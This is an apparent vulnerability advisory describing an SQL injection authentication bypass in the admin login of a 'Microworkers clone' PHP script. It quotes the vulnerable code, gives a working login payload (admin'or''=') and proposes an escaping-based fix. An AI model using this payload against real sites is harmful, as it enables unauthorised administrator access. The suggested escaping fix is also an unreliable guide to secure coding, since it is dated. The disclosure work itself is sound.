============================================================= Microworkers clone script by: Annexwaretexolution ( http://www.annexware.com/ ) Official site seems down for now alternatively you can find this script in eg from here: http://clonesite.do.am/load/0-0-1-163-20 or from google. ============================================================= Microworkers clone script by: Annexwaretexolution ( http://www.annexware.com/ ) is prone to SQL injection vulnerability. ============================================================= Vuln Desc: While online penetration testing this script i managed to find SQL injection vulnerability in it which leads to Auth Bypass without knowing valid password for administrator account. Here we go: //administrator/loginshed.php ======================Vulnerable Code Section:===================== 0) { $s = dbQuery("update `adminlogin` set `logintime`= '".$totaldate."' where `username`='".$username."' ; "); $_SESSION["adminusername"]=$username; header("location: adminhome.php"); } else { header("location: index.php?msg=error"); } ?> ==================EOF Vulnerable Code Section:========================= ======================GPC=OFF==================================== Exploit: Login: admin'or''=' Password:whateveryouwant ================================================================== Fix: Open administrator/loginshed.php and replace variables: $username= $_POST["username"]; $password= $_POST["password"]; with this: $username= mysql_real_escape_string(htmlentities($_POST["username"])); $password= mysql_real_escape_string(htmlentities($_POST["password"])); ================================================================ [+]Vendor notified about issuse. ================================================================ [-]No Dork for scriptkiddiez. ================================================================ +++++++++My Sincerely Thanks to:+++++++++++++++++++ packetstormsecurity.org packetstormsecurity.com packetstormsecurity.net securityfocus.com cxsecurity.com security.nnov.ru securtiyvulns.com securitylab.ru 1337day.com secunia.com securityhome.eu to all AA Team + to all Azerbaijan Black HatZ + Especially to my bro CAMOUFL4G3. ++++++++++++++++++++++++++++++++++++++++++++++++ Respect && Thank you. /AkaStep ^_^